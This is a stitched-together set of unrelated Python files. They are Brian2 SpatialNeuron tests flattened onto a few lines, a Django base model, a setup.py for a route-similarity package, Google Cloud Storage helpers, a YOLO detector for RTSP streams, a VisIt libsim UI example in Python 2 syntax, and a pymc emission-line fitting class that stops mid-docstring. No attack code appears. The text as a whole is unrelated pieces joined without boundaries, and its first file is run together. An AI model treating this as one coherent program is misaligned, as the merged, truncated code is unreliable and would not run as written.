mon = StateMonitor(neuron, 'v', record=True) run(0.25*ms) assert all(abs(mon.v[:, -1]/mV + 10) < 0.25), mon.v[:, -1]/mV @pytest.mark.codegen_independent def test_allowed_integration(): morph = Soma(diameter=30 * um) EL = -70 * mV gL = 1e-4 * siemens / cm ** 2 ENa = 115 * mV gNa = 120 * msiemens / cm ** 2 VT = -50.4 * mV DeltaT = 2 * mV ENMDA = 0. 
* mV @check_units(voltage=volt, result=volt) def user_fun(voltage): return voltage # could be an arbitrary function and is therefore unsafe allowed_eqs = ['Im = gL*(EL-v) : amp/meter**2', '''Im = gl * (El-v) + gNa * m**3 * h * (ENa-v) : amp/meter**2 dm/dt = alpham * (1-m) - betam * m : 1 dh/dt = alphah * (1-h) - betah * h : 1 alpham = (0.1/mV) * (-v+25*mV) / (exp((-v+25*mV) / (10*mV)) - 1)/ms : Hz betam = 4 * exp(-v/(18*mV))/ms : Hz alphah = 0.07 * exp(-v/(20*mV))/ms : Hz betah = 1/(exp((-v+30*mV) / (10*mV)) + 1)/ms : Hz''', '''Im = gl * (El-v) : amp/meter**2 I_ext = 1*nA + sin(2*pi*100*Hz*t)*nA : amp (point current)''', '''Im = I_leak + I_spike : amp/meter**2 I_leak = gL*(EL - v) : amp/meter**2 I_spike = gL*DeltaT*exp((v - VT)/DeltaT): amp/meter**2 (constant over dt) ''', ''' Im = gL*(EL-v) : amp/meter**2 I_NMDA = gNMDA*(ENMDA-v)*Mgblock : amp (point current) gNMDA : siemens Mgblock = 1./(1. + exp(-0.062*v/mV)/3.57) : 1 (constant over dt) ''', 'Im = gL*(EL - v) + gL*DeltaT*exp((v - VT)/DeltaT) : amp/meter**2', '''Im = I_leak + I_spike : amp/meter**2 I_leak = gL*(EL - v) : amp/meter**2 I_spike = gL*DeltaT*exp((v - VT)/DeltaT): amp/meter**2 ''', ''' Im = gL*(EL-v) : amp/meter**2 I_NMDA = gNMDA*(ENMDA-v)*Mgblock : amp (point current) gNMDA : siemens Mgblock = 1./(1. 
+ exp(-0.062*v/mV)/3.57) : 1 ''', ] forbidden_eqs = [ '''Im = gl * (El-v + user_fun(v)) : amp/meter**2''', '''Im = gl * clip(El-v, -100*mV, 100*mV) : amp/meter**2''', ] for eqs in allowed_eqs: # Should not raise an error neuron = SpatialNeuron(morph, eqs) for eqs in forbidden_eqs: # Should raise an error with pytest.raises(TypeError): SpatialNeuron(morph, eqs) @pytest.mark.codegen_independent def test_spatialneuron_indexing(): sec = Cylinder(length=50*um, diameter=10*um, n=1) sec.sec1 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec11 = Cylinder(length=50 * um, diameter=10 * um, n=4) sec.sec1.sec12 = Cylinder(length=50 * um, diameter=10 * um, n=8) sec.sec2 = Cylinder(length=50 * um, diameter=10 * um, n=16) sec.sec2.sec21 = Cylinder(length=50 * um, diameter=10 * um, n=32) neuron = SpatialNeuron(sec, 'Im = 0*amp/meter**2 : amp/meter**2') # Accessing indices/variables of a subtree refers to the full subtree assert len(neuron.indices[:]) == 1 + 2 + 4 + 8 + 16 + 32 assert len(neuron.sec1.indices[:]) == 2 + 4 + 8 assert len(neuron.sec1.sec11.indices[:]) == 4 assert len(neuron.sec1.sec12.indices[:]) == 8 assert len(neuron.sec2.indices[:]) == 16 + 32 assert len(neuron.sec2.sec21.indices[:]) == 32 assert len(neuron.v[:]) == 1 + 2 + 4 + 8 + 16 + 32 assert len(neuron.sec1.v[:]) == 2 + 4 + 8 assert len(neuron.sec1.sec11.v[:]) == 4 assert len(neuron.sec1.sec12.v[:]) == 8 assert len(neuron.sec2.v[:]) == 16 + 32 assert len(neuron.sec2.sec21.v[:]) == 32 # Accessing indices/variables with ".main" only refers to the section assert len(neuron.main.indices[:]) == 1 assert len(neuron.sec1.main.indices[:]) == 2 assert len(neuron.sec1.sec11.main.indices[:]) == 4 assert len(neuron.sec1.sec12.main.indices[:]) == 8 assert len(neuron.sec2.main.indices[:]) == 16 assert len(neuron.sec2.sec21.main.indices[:]) == 32 assert len(neuron.main.v[:]) == 1 assert len(neuron.sec1.main.v[:]) == 2 assert len(neuron.sec1.sec11.main.v[:]) == 4 assert len(neuron.sec1.sec12.main.v[:]) == 8 
assert len(neuron.sec2.main.v[:]) == 16 assert len(neuron.sec2.sec21.main.v[:]) == 32 # Accessing subgroups assert len(neuron[0].indices[:]) == 1 assert len(neuron[0*um:50*um].indices[:]) == 1 assert len(neuron[0:1].indices[:]) == 1 assert len(neuron[sec.sec2.indices[:]]) == 16 assert len(neuron[sec.sec2]) == 16 @pytest.mark.codegen_independent def test_tree_index_consistency(): # Test all possible trees with depth 3 and a maximum of 3 branches subtree # (a total of 84 trees) # This tests whether the indices (i.e. where the compartments are placed in # the overall flattened 1D structure) make sense: for the `SpatialSubgroup` # mechanism to work correctly, each subtree has to have contiguous indices. # Separate subtrees should of course have non-overlapping indices. for tree_description in itertools.product([1, 2, 3], # children of root [0, 1, 2, 3], # children of first branch [0, 1, 2, 3], # children of second branch [0, 1, 2, 3] # children of third branch ): sec = Cylinder(length=50 * um, diameter=10 * um, n=1) root_children = tree_description[0] if not all([tree_description[x] == 0 for x in range(root_children + 1, 4)]): # skip redundant descriptions (differing number of branches in a # subtree that does not exist) continue # Create a tree according to the description for idx in range(root_children): setattr(sec, 'sec%d' % (idx + 1), Cylinder(length=50*um, diameter=10*um, n=2*(idx + 1))) for child in range(root_children): subsec = getattr(sec, 'sec%d' % (child + 1)) subsec_children = tree_description[child + 1] for idx in range(subsec_children): setattr(subsec, 'sec%d%d' % (child + 1, idx + 1), Cylinder(length=50 * um, diameter=10 * um, n=1 + (child + 1) * idx)) neuron = SpatialNeuron(sec, 'Im = 0*amp/meter**2 : amp/meter**2') # Check the indicies for the full neuron: assert_equal(neuron.indices[:], np.arange(sec.total_compartments)) all_subsec_indices = [] for child in range(root_children): subsec = getattr(neuron, 'sec%d' % (child + 1)) sub_indices = 
set(subsec.main.indices[:]) subsec_children = tree_description[child + 1] for idx in range(subsec_children): subsubsec = getattr(subsec, 'sec%d%d' % (child + 1, idx + 1)) sub_indices |= set(subsubsec.main.indices[:]) # The indices for a full subtree should be the union of the indices # for all subsections within that subtree assert sub_indices == set(subsec.indices[:]) all_subsec_indices.extend(subsec.indices[:]) # Separate subtrees should not overlap assert len(all_subsec_indices) == len(set(all_subsec_indices)) @pytest.mark.codegen_independent def test_spatialneuron_subtree_assignment(): sec = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec11 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec12 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec2 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec2.sec21 = Cylinder(length=50 * um, diameter=10 * um, n=2) neuron = SpatialNeuron(sec, 'Im = 0*amp/meter**2 : amp/meter**2') neuron.v = 1*volt assert_allclose(neuron.v[:], np.ones(12)*volt) neuron.sec1.v += 1*volt assert_allclose(neuron.main.v[:], np.ones(2)*volt) assert_allclose(neuron.sec1.v[:], np.ones(6)*2*volt) assert_allclose(neuron.sec1.main.v[:], np.ones(2)*2*volt) assert_allclose(neuron.sec1.sec11.v[:], np.ones(2)*2*volt) assert_allclose(neuron.sec1.sec12.v[:], np.ones(2)*2*volt) assert_allclose(neuron.sec2.v[:], np.ones(4)*volt) neuron.sec2.v = 5*volt assert_allclose(neuron.sec2.v[:], np.ones(4)*5*volt) assert_allclose(neuron.sec2.main.v[:], np.ones(2)*5*volt) assert_allclose(neuron.sec2.sec21.v[:], np.ones(2)*5*volt) @pytest.mark.codegen_independent def test_spatialneuron_morphology_assignment(): sec = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec11 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec1.sec12 = Cylinder(length=50 * um, diameter=10 * um, n=2) sec.sec2 = Cylinder(length=50 * 
um, diameter=10 * um, n=2) sec.sec2.sec21 = Cylinder(length=50 * um, diameter=10 * um, n=2) neuron = SpatialNeuron(sec, 'Im = 0*amp/meter**2 : amp/meter**2') neuron.v[sec.sec1.sec11] = 1*volt assert_allclose(neuron.sec1.sec11.v[:], np.ones(2)*volt) assert_allclose(neuron.sec1.sec12.v[:], np.zeros(2)*volt) assert_allclose(neuron.sec1.main.v[:], np.zeros(2)*volt) assert_allclose(neuron.main.v[:], np.zeros(2)*volt) assert_allclose(neuron.sec2.v[:], np.zeros(4)*volt) neuron.v[sec.sec2[25*um:]] = 2*volt neuron.v[sec.sec1[:25*um]] = 3 * volt assert_allclose(neuron.main.v[:], np.zeros(2)*volt) assert_allclose(neuron.sec2.main.v[:], [0, 2]*volt) assert_allclose(neuron.sec2.sec21.v[:], np.zeros(2)*volt) assert_allclose(neuron.sec1.main.v[:], [3, 0]*volt) assert_allclose(neuron.sec1.sec11.v[:], np.ones(2)*volt) assert_allclose(neuron.sec1.sec12.v[:], np.zeros(2)*volt) @pytest.mark.standalone_compatible @pytest.mark.multiple_runs def test_spatialneuron_capacitive_currents(): if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') defaultclock.dt = 0.1*ms morpho = Cylinder(x=[0, 10]*cm, diameter=2*238*um, n=200, type='axon') El = 10.613* mV ENa = 115*mV EK = -12*mV gl = 0.3*msiemens/cm**2 gNa0 = 120*msiemens/cm**2 gK = 36*msiemens/cm**2 # Typical equations eqs = ''' # The same equations for the whole neuron, but possibly different parameter values # distributed transmembrane current Im = gl * (El-v) + gNa * m**3 * h * (ENa-v) + gK * n**4 * (EK-v) : amp/meter**2 I : amp (point current) # applied current dm/dt = alpham * (1-m) - betam * m : 1 dn/dt = alphan * (1-n) - betan * n : 1 dh/dt = alphah * (1-h) - betah * h : 1 alpham = (0.1/mV) * (-v+25*mV) / (exp((-v+25*mV) / (10*mV)) - 1)/ms : Hz betam = 4 * exp(-v/(18*mV))/ms : Hz alphah = 0.07 * exp(-v/(20*mV))/ms : Hz betah = 1/(exp((-v+30*mV) / (10*mV)) + 1)/ms : Hz alphan = (0.01/mV) * (-v+10*mV) / (exp((-v+10*mV) / (10*mV)) - 1)/ms : Hz betan = 0.125*exp(-v/(80*mV))/ms : Hz gNa : 
siemens/meter**2 ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1*uF/cm**2, Ri=35.4*ohm*cm, method="exponential_euler") mon = StateMonitor(neuron, ['Im', 'Ic'], record=True, when='end') run(10*ms) neuron.I[0] = 1*uA # current injection at one end run(3*ms) neuron.I = 0*amp run(10*ms) device.build(direct_call=False, **device.build_options) assert_allclose((mon.Im-mon.Ic).sum(axis=0)/(mA/cm**2), np.zeros(230), atol=1e6) if __name__ == '__main__': test_custom_events() test_construction() test_construction_coordinates() test_infinitecable() test_finitecable() test_rallpack1() test_rallpack2() test_rallpack3() test_rall() test_basic_diffusion() test_allowed_integration() test_spatialneuron_indexing() test_tree_index_consistency() test_spatialneuron_subtree_assignment() test_spatialneuron_morphology_assignment() test_spatialneuron_capacitive_currents()
python
from django.db import models
from django.contrib.auth.models import AbstractUser


class BaseModel(models.Model):
    """ A base abstract model from which all other models will inherit. """

    # Stamped once on INSERT (auto_now_add); never touched afterwards.
    created = models.DateTimeField(
        auto_now_add=True,
        blank=True,
        null=True,
        help_text='Record first created date and time.'
    )
    # Refreshed on every save() (auto_now).
    modified = models.DateTimeField(
        auto_now=True,
        blank=True,
        null=True,
        help_text='Record last modified date and time.'
    )

    class Meta:
        # Abstract: no table is created for this model; it only contributes
        # the created/modified fields to concrete subclasses.
        abstract = True


class CustomUser(AbstractUser):
    """ A custom user model for the built in Auth system """
    # Intentionally empty: swapping in a custom user model from the start
    # allows adding fields later without a disruptive auth migration.
    pass
python
from __future__ import absolute_import
import pkg_resources
import setuptools
import setuptools.command.build_ext
import setuptools.command.test

# Package metadata.
__author__ = 'Shashank Shekhar'
__version__ = '0.14'
__email__ = '[email protected]'
__download_url__ = 'https://github.com/shkr/routesimilarity/archive/0.1.tar.gz'

# Build from the .pyx source when Cython is available; otherwise fall back
# to the pre-generated C file shipped with the sdist.
try:
    import Cython.Build
    __cython = True
except ImportError:
    __cython = False


class BuildExtension(setuptools.command.build_ext.build_ext):
    """build_ext subclass that injects NumPy's C headers into every extension."""

    def build_extensions(self):
        # Resolve NumPy's include directory at build time, after
        # setup_requires has guaranteed NumPy is installed.
        numpy_includes = pkg_resources.resource_filename("numpy", "core/include")
        for extension in self.extensions:
            # Append the NumPy include path at most once per extension.
            if not hasattr(extension, "include_dirs") or \
                    (hasattr(extension, "include_dirs") and numpy_includes not in extension.include_dirs):
                extension.include_dirs.append(numpy_includes)
        setuptools.command.build_ext.build_ext.build_extensions(self)


# The single extension module; source suffix depends on Cython availability.
__extensions = [
    setuptools.Extension(
        name="routesimilarity.directed_hausdorff",
        sources=[
            "routesimilarity/directed_hausdorff.{}".format("pyx" if __cython else "c")
        ],
        # Aggressive optimization; NOTE(review): -march=native ties the built
        # wheel to the build host's CPU.
        extra_compile_args = ["-O3", "-ffast-math", "-march=native"]
    )
]

if __cython:
    __extensions = Cython.Build.cythonize(__extensions)

# PyPI long description comes straight from the README.
with open("README.md", "r") as fh:
    long_description = fh.read()

setuptools.setup(
    name='routesimilarity',
    packages=['routesimilarity'],
    version=__version__,
    license='MIT',
    description='Methods for similarity scoring between routes',
    long_description=long_description,
    long_description_content_type="text/markdown",
    author=__author__,
    author_email=__email__,
    url='https://github.com/shkr/routesimilarity',
    download_url=__download_url__,
    keywords=['route', 'similarity', 'hausdorff'],
    install_requires=[
        'geopy',
        'numpy>=1.15'
    ],
    setup_requires=[
        'cython>=0.28',
        'numpy>=1.15'
    ],
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Science/Research',
        'Intended Audience :: Developers',
        'Programming Language :: Python :: 3'
    ],
    ext_modules=__extensions,
    cmdclass={"build_ext": BuildExtension}
)
python
import json
import os
from itertools import groupby
from pathlib import Path
from typing import List, Union

from google.cloud import storage


def load_config(train_or_apply: str) -> dict:
    """Load the 'train' or 'apply' section of config.json located next to this file.

    Args:
        train_or_apply (str): Top-level key of config.json to return.

    Returns:
        dict: The selected configuration section.
    """
    config_file_path = Path(__file__).parent.resolve() / "config.json"
    with open(config_file_path, "r") as f:
        config = json.load(f)
    return config[train_or_apply]


def doc_to_spans(doc):
    """Convert a spaCy doc to Label Studio-compatible named-entity span dicts.

    Consecutive tokens sharing the same entity type are merged into one span.

    Args:
        doc: A spaCy ``Doc`` (tokens expose ``text``, ``idx``, ``ent_type_``).

    Returns:
        tuple: (list of Label Studio result dicts, set of entity labels seen).
    """
    tokens = [(tok.text, tok.idx, tok.ent_type_) for tok in doc]
    results = []
    entities = set()
    # groupby merges adjacent tokens with the same entity label; empty label
    # means "no entity" and is skipped.
    for entity, group in groupby(tokens, key=lambda t: t[-1]):
        if not entity:
            continue
        group = list(group)
        _, start, _ = group[0]
        word, last, _ = group[-1]
        text = " ".join(item[0] for item in group)
        end = last + len(word)
        results.append(
            {
                "from_name": "label",
                "to_name": "text",
                "type": "labels",
                "value": {"start": start, "end": end, "text": text, "labels": [entity]},
            }
        )
        entities.add(entity)
    return results, entities


def load_train_data(train_data_files) -> List:
    """Load JSONL train data as a list ready to be ingested by a spaCy model.

    Args:
        train_data_files: Iterable of JSONL file paths; each line holds a dict
            with "text" and "entities" keys.

    Returns:
        List: Tuples of (text, {"entities": [...]}) to be used for training.
    """
    train_data = []
    for data_file in train_data_files:
        with open(data_file, "r") as f:
            # Iterate the file lazily instead of materializing it with list(f).
            for json_str in f:
                train_data_dict = json.loads(json_str)
                train_text = train_data_dict["text"]
                train_entities = {
                    "entities": [
                        tuple(entity_elt) for entity_elt in train_data_dict["entities"]
                    ]
                }
                train_data.append((train_text, train_entities))
    return train_data


def download_from_gcs(
    bucket_name: str,
    source_blob_name: str,
    destination_folder: str,
    explicit_filepath: bool = False,
) -> Union[str, List[str]]:
    """Download GCS data locally, flattening blob paths into file names.

    Args:
        bucket_name (str): Name of the GCS bucket.
        source_blob_name (str): GCS path prefix to data in the bucket.
        destination_folder (str): Folder to download GCS data to.
        explicit_filepath (bool, optional): If True, return the explicit list of
            downloaded file paths instead of the destination folder. Defaults to False.

    Returns:
        Union[str, List[str]]: Destination folder, or list of downloaded paths
        when ``explicit_filepath`` is True.
    """
    storage_client = storage.Client()
    bucket = storage_client.bucket(bucket_name)
    blobs = bucket.list_blobs(prefix=source_blob_name)
    # Make sure the target folder exists before writing into it.
    os.makedirs(destination_folder, exist_ok=True)
    filepath_list = []
    for blob in blobs:
        # Skip "directory" placeholder blobs.
        if not blob.name.endswith("/"):
            filename = blob.name.replace("/", "_")
            local_path = os.path.join(destination_folder, filename)
            blob.download_to_filename(local_path)
            filepath_list.append(local_path)
    print(f"Downloaded at {destination_folder}")
    if explicit_filepath:
        return filepath_list
    return destination_folder


def download_bytes_from_gcs(bucket_name, source_blob_name):
    """Return the raw bytes of a single GCS blob."""
    storage_client = storage.Client()
    bucket = storage_client.bucket(bucket_name)
    blob = bucket.blob(source_blob_name)
    return blob.download_as_string()


def upload_to_gcs(bucket_name, source_blob_name, data, content_type=None):
    """Upload ``data`` (str/bytes) to a GCS blob, optionally with a content type."""
    storage_client = storage.Client()
    bucket = storage_client.bucket(bucket_name)
    blob = bucket.blob(source_blob_name)
    blob.upload_from_string(data, content_type=content_type)
python
# Adapted from repo botwizer by DevGltich
# https://github.com/DevGlitch/botwizer
# Resources used:
# https://github.com/AlexeyAB/darknet
# https://www.youtube.com/watch?v=Z_uPIUbGCkA

import cv2
import numpy as np
from time import sleep


def stream_object_detection_text(rtsp_url, config_path, weights_path, labels_path):
    """Run YOLO on a streaming feed and yield the labels of detected objects.

    :param rtsp_url: RTSP URL of stream to analyse
    :param config_path: path of the .cfg file
    :param weights_path: path of the .weights file
    :param labels_path: path of the .names file
    :return: generator yielding, per analysed frame, the list of object labels
        detected with probability > 0.7 (after non-maximum suppression)
    """
    print("[INFO] Initializing...")
    sleep(1)

    # Load the Darknet model (config + weights).
    net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
    print("[INFO] Model loaded.")
    sleep(1)

    # Object labels; `with` guarantees the file is closed even on error
    # (the original left it open until the end of the function).
    with open(labels_path) as obj_names:
        obj_labels = obj_names.read().strip().split("\n")
    print("[INFO] Object labels loaded.")
    sleep(1)

    # Open the RTSP stream.
    print("[INFO] Stream Capture Starting...")
    stream_video = cv2.VideoCapture(rtsp_url)
    print("[INFO] Stream Capture Started.")

    print("[INFO] Starting Object Detection Analysis...")
    while stream_video.isOpened():
        grabbed, image = stream_video.read()
        # Stop cleanly on end-of-stream / dropped frame instead of crashing
        # on `image.shape` when read() fails.
        if not grabbed or image is None:
            break

        img_row, img_col = image.shape[:2]

        # 4-dimensional blob from image; swapRB=True improves classification
        # accuracy with Darknet models.
        blob = cv2.dnn.blobFromImage(
            image, 1 / 255.0, (416, 416), swapRB=True, crop=False
        )
        net.setInput(blob)  # single call (the original set the input twice)

        # Output layer names; flatten() makes the 1-based indices work on both
        # OpenCV < 4.5.4 (Nx1 array) and >= 4.5.4 (flat array).
        layer_names = net.getLayerNames()
        out_ids = np.array(net.getUnconnectedOutLayers()).flatten()
        out_layer_names = [layer_names[i - 1] for i in out_ids]

        outputs = net.forward(out_layer_names)

        grid, probabilities, labels = [], [], []

        # Each output row is [cx, cy, w, h, objectness, class scores...].
        for output in outputs:
            for detection in output:
                score = detection[5:]
                label = np.argmax(score)
                prob = score[label]

                # Keep only detections above 70% probability; tune if needed.
                if prob > 0.7:
                    # Scale the normalized box back to image coordinates.
                    grid_box = detection[:4] * np.array(
                        [img_col, img_row, img_col, img_row]
                    )
                    (X, Y, width, height) = grid_box.astype("int")
                    x = X - (width / 2)
                    y = Y - (height / 2)

                    probabilities.append(float(prob))
                    labels.append(label)
                    grid.append([int(x), int(y), int(width), int(height)])

        # Non-maximum suppression keeps only the highest-probability boxes.
        NMS = cv2.dnn.NMSBoxes(grid, probabilities, 0.6, 0.6)

        # If at least one object survived suppression, yield its labels.
        if len(NMS) > 0:
            objects = []
            for i in np.array(NMS).flatten():
                objects += [f"{obj_labels[labels[i]]}"]
            yield objects

    # Release stream
    stream_video.release()
python
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import division import numpy as np from time import sleep from visitor import * from visitor import VisitInstrumentation, VISIT_MESHTYPE_POINT counter = 0 def dp(*args, **kwargs): x = np.linspace(-5.,4.,100) y = np.linspace(0.,10.,100) return x, y def cycle_time_provider(*args, **kwargs): return counter, counter/1e9 def step(*args, **kwargs): global counter sleep(0.2) counter += 1 def count(*arg, **kwargs): return counter def message(*arg, **kwargs): return str(counter/1e9) def number(arg, *args, **kwargs): print arg def main(): name = 'ui_example' prefix = '.' description = 'This example demonstrates the ui capabilities of libsim.' v = VisitInstrumentation(name, description, prefix=prefix, step=step, cycle_time_provider=cycle_time_provider, ui="./example.ui", ) v.register_mesh('point_mesh_2d', dp, VISIT_MESHTYPE_POINT, 2, number_of_domains=1, domain_title="Domains", domain_piece_name="domain", num_of_groups=0, xunits="cm", yunits="cm", xlabel="a", ylabel="b") v.register_ui_set_int("progress", count) v.register_ui_set_string("text", message) v.register_ui_value("spin", number, None) v.register_ui_value("dial", number, None) v.run() if __name__ == '__main__': main()
python
from os import environ
environ["MKL_THREADING_LAYER"] = "GNU"
import pymc3
import pymc as pymc2
import cPickle as pickle
import theano
import theano.tensor as tt
import numpy as np
from collections import OrderedDict
from time import sleep
from numpy import mean, std, square, percentile, median, sum as np_sum, array, ones, empty
from lib.specSynthesizer_tools import ModelIngredients
from lib.Astro_Libraries.spectrum_fitting.gasEmission_functions import TOIII_TSIII_relation
from lib.Astro_Libraries.spectrum_fitting.import_functions import parseObjData

# Line to avoid the compute_test_value error
theano.config.compute_test_value = 'ignore'


def displaySimulationData(model, priorsDict, lineLabels, lineFluxes, lineErr, lineFitErr):
    """Print a summary of the simulation setup: input line fluxes (warning when
    the fit error differs from the observed error), prior design, model test
    points and their log probabilities. Pauses briefly before sampling starts."""
    print('\n- Simulation configuration')

    # Print input lines and fluxes
    print('\n-- Input lines')
    for i in range(lineLabels.size):
        warnLine = '{}'.format('|| WARNING obsLineErr = {:.4f}'.format(lineErr[i]) if lineErr[i] != lineFitErr[i] else '')
        displayText = '{} flux = {:.4f} +/- {:.4f} || err % = {:.5f} {}'.format(lineLabels[i], lineFluxes[i], lineFitErr[i], lineFitErr[i] / lineFluxes[i], warnLine)
        print(displayText)

    # Present the model data
    print('\n-- Priors design:')
    for prior in priorsDict:
        displayText = '{} : mu = {}, std = {}'.format(prior, priorsDict[prior][0], priorsDict[prior][1])
        print(displayText)

    # Check test_values are finite
    print('\n-- Test points:')
    model_var = model.test_point
    for var in model_var:
        displayText = '{} = {}'.format(var, model_var[var])
        print(displayText)

    # Checks log probability of random variables
    print('\n-- Log probability variable:')
    print(model.check_test_point())

    # Wait a bit before starting the simulation
    sleep(0.5)
    return


class SpectraSynthesizer(ModelIngredients):
    """MCMC fitting of emission-line spectra, with both pymc2 (MAP + MCMC) and
    pymc3 (HMC/NUTS) back-ends. NOTE: the original code referenced an undefined
    name `pymc_examples` throughout the pymc3 models (only `pymc3` is imported),
    which raised NameError on every HMC/NUTS run; all such uses are fixed to
    `pymc3` here."""

    def __init__(self):
        ModelIngredients.__init__(self)

        # Priors conf
        self.modelParams = ['n_e', 'T_low', 'T_high', 'cHbeta', 'Ar3', 'Ar4', 'N2',
                            'O2', 'O3', 'S2', 'S3', 'tau', 'He1r', 'He2r']
        self.defaultPriosConf = {}

        # Normalization constants for the plots
        # TODO this should go together with the reparamatrization
        self.normContants = {'He1r': 0.1, 'He2r': 0.001}

        # Dictionary with the models
        self.modelDict = dict(nuts=self.nuts_TwoTemps, HMC=self.emissionHMC,
                              stelar_prefit=self.stellarContinua_model)

    def fitSpectra(self, model_name, hammer='HMC', iterations=8000, tuning=2000, priors_conf=None,
                   include_reddening=True, include_Thigh_prior=True):
        """Run the full fit: sample, reload the traces, derive elemental
        abundances, store mean/std per parameter in the object log and plot."""
        # Declare the priors configuration
        self.priorsConf = self.defaultPriosConf.copy()
        if priors_conf is not None:
            self.priorsConf.update(priors_conf)

        # Run the sampler
        # TODO need to decide where to place this
        db_address = self.output_folder + model_name + '.db'  # TODO Deberiamos poder quitar este .db
        self.run_pymc(hammer, db_address, iterations, tuning,
                      include_reddening=include_reddening, include_Thigh_prior=include_Thigh_prior)

        # Load the results
        interenceParamsDict = self.load_pymc_database_manual(db_address, sampler='pymc3')

        # Compute elemental abundances from the traces
        self.elementalChemicalModel(interenceParamsDict, self.obsAtoms, iterations * 2)

        # Save parameters into the object log
        # TODO make a new mechanism to delete the results region
        store_params = OrderedDict()
        for parameter in interenceParamsDict.keys():
            # Skip pymc3 transformed/internal variables.
            if ('_log__' not in parameter) and ('interval' not in parameter) and ('_op' not in parameter):
                trace = interenceParamsDict[parameter]
                store_params[parameter] = np.array([trace.mean(), trace.std()])
        parseObjData(self.configFile, self.objName + '_results', store_params)

        # Plot output data
        self.plotOuputData(self.output_folder + model_name, interenceParamsDict, self.modelParams)
        return

    def run_pymc(self, model, db_address, iterations=10000, tuning=0, prefit=True,
                 include_reddening=True, include_Thigh_prior=True):
        """Dispatch a sampling run. Non-'HMC' model names use the pymc2 path
        (MAP prefit + MCMC with a pickle database); 'HMC' names call the pymc3
        model and pickle {'model', 'trace'} to db_address."""
        # TODO this part is very dirty it is not clear where it goes
        if 'HMC' not in model:
            variables_list = self.priorsConf.keys()

            # Define MCMC model
            MAP_Model = pymc2.MAP(self.modelDict[model])

            # Prefit:
            if prefit is not False:
                # FIX: original tested `prefit is str` (always False for a
                # string instance); use isinstance so a string prefit selects
                # the fit method.
                fit_method = prefit if isinstance(prefit, str) else 'fmin_powell'
                MAP_Model.fit(method=fit_method)

                # Print prefit data
                self.display_run_data(MAP_Model, variables_list)

            # Launch sample
            self.pymc2_M = pymc2.MCMC(MAP_Model.variables, db='pickle', dbname=db_address)
            self.pymc2_M.sample(iter=iterations)

            # Save the output csv mean data
            if variables_list is not None:
                csv_address = db_address + '_Parameters'
                self.pymc2_M.write_csv(csv_address, variables=variables_list)

            # Print again the output prediction for the entire trace
            self.display_run_data(MAP_Model, variables_list)

            # Close the database
            self.pymc2_M.db.close()

        else:
            # Launch sample
            trace, model = self.modelDict[model](iterations, tuning, include_reddening, include_Thigh_prior)

            # Save the data
            with open(db_address, 'wb') as trace_pickle:
                pickle.dump({'model': model, 'trace': trace}, trace_pickle)

    def priorsConfiguration(self):
        """Prepare shared tensors for the samplers (line-flux container,
        stellar bases, continuum error). Currently only sets up locals; kept
        for parity with the original."""
        # Container to store the synthetic line fluxes
        if self.emissionCheck:
            lineFlux_tt = tt.zeros(self.lineLabels.size)
            continuum = tt.zeros(self.obj_data['wave_resam'].size)

        # Stellar bases tensor
        if self.stellarCheck:
            Xx_tt = theano.shared(self.Xx_stellar)
            basesFlux_tt = theano.shared(self.onBasesFluxNorm)
            nebular_continuum_tt = theano.shared(self.nebDefault['synth_neb_flux'])
            err_Continuum = 0.10 * ones(self.inputContinuum.size)  # TODO really need to check this

        return

    def emissionHMC(self, iterations, tuning, include_reddening=True, include_Thigh_prior=True):
        """pymc3 HMC model for the emission-line fluxes only.

        Returns (trace, model)."""
        # Container to store the synthetic line fluxes
        lineFluxTTArray = tt.zeros(self.lineLabels.size)

        with pymc3.Model() as model:

            # Gas priors
            T_low = pymc3.Normal('T_low', mu=self.priorsDict['T_low'][0], sd=self.priorsDict['T_low'][1])
            n_e = pymc3.Normal('n_e', mu=self.priorsDict['n_e'][0], sd=self.priorsDict['n_e'][1])
            cHbeta = pymc3.Lognormal('cHbeta', mu=0, sd=1) if include_reddening else self.obj_data['cHbeta_true']
            tau = pymc3.Lognormal('tau', mu=0, sd=0.4) if self.He1rCheck else 0.0

            # High ionization region temperature
            # NOTE(review): the T_high prior reuses the T_low prior parameters
            # — confirm this is intentional.
            if include_Thigh_prior:
                T_high = pymc3.Normal('T_high', mu=self.priorsDict['T_low'][0], sd=self.priorsDict['T_low'][1])
            else:
                T_high = TOIII_TSIII_relation(T_low)

            # Composition priors (H1r fixed at 1, He reparameterized by normContants)
            abund_dict = {'H1r': 1.0}
            for j in self.rangeObsAtoms:
                if self.obsAtoms[j] == 'He1r':
                    abund_dict[self.obsAtoms[j]] = self.normContants['He1r'] * pymc3.Lognormal(self.obsAtoms[j], mu=0, sd=1)
                elif self.obsAtoms[j] == 'He2r':
                    abund_dict[self.obsAtoms[j]] = self.normContants['He2r'] * pymc3.Lognormal(self.obsAtoms[j], mu=0, sd=1)
                else:
                    abund_dict[self.obsAtoms[j]] = pymc3.Normal(self.obsAtoms[j], mu=5, sd=5)

            # Compute emission line fluxes
            lineFluxTTArray = self.calcEmFluxes(T_low, T_high, n_e, cHbeta, tau, abund_dict,
                                                self.emFlux_ttMethods, lineFluxTTArray, True)

            # Store computed fluxes
            pymc3.Deterministic('calcFluxes_Op', lineFluxTTArray)

            # Likelihood gas components
            Y_emision = pymc3.Normal('Y_emision', mu=lineFluxTTArray, sd=self.fitLineFluxErr,
                                     observed=self.obsLineFluxes)

            # Display simulation data
            displaySimulationData(model, self.priorsDict, self.lineLabels, self.obsLineFluxes,
                                  self.obsLineFluxErr, self.fitLineFluxErr)

        # Launch model
        print('\n- Launching sampling')
        trace = pymc3.sample(iterations, tune=tuning, nchains=2, njobs=1, model=model)

        return trace, model

    def nuts_model(self, iterations, tuning):
        """pymc3 NUTS model combining the stellar continuum (if available) and
        the emission lines with a single low/high temperature pair.

